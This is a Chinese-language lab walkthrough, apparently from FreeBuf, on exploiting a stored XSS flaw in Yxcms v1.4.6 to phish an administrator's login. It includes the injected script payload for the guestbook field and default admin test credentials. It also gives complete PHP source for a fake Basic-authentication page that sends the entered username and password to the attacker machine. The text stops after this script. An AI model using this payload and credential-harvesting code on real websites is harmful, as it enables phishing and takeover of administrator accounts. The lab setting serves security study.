攻击机器:192.168.5.141(windows 10 + Phpstudy + PHP + Apache + PHP恶意脚本)
目标主机:192.168.5.146(windows 7 + Phpstudy + PHP + Apache + Yxcms_v1.4.6)
思路设想:寻找存储XSS攻击漏洞,构造Basic认证页面钓鱼载荷,通过利用存储XSS攻击漏洞将Basic认证页面钓鱼载荷植入目标网站管理员后台,管理员一旦访问到载荷则触发并弹出Basic认证页面请求管理员认证;一旦管理员输入账号密码,则恶意服务器就会成功接收到账号密码。
一、挖掘XSS攻击漏洞
首页地址:http://www.yxcms_v1.4.6.com/
后台地址:http://www.yxcms_v1.4.6.com/index.php?r=admin/index/login
(1)攻击机器访问网站首页并插入XSS弹窗脚本
Burpsuite抓取数据包:
Burpsuite修改数据包:tname[]=pandora<script%26gt;alert("xss")</script%26gt;
Burpsuite放过数据包:
注意:此时,攻击者已成功插入XSS弹窗脚本(盲XSS)。
(2)目标靶机管理员登录后台并查看留言本:http://www.yxcms_v1.4.6.com/index.php?r=admin/index/login
账号密码:admin/123456
注意:此时,目标靶机管理员已成功触发XSS弹窗脚本,存在存储(盲打)XSS攻击漏洞。
二、攻击机准备Basic认证页面钓鱼脚本
(1)基本登录认证页面钓鱼代码:auth.php
----------------------------------------------------------------------------------------------------------------------
<?php
error_reporting(0);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
header('Content-type:text/html; charset=utf-8' );
header('WWW-Authenticate: Basic realm="'.addslashes(trim($_GET['info'])).'"');
header('HTTP/1.0 401 Unauthorized');
echo 'Authorization Required.';
exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
header("Location: http://192.168.5.141/recode.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}
?>
------------------------------------------------------------------------------------------------------------
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)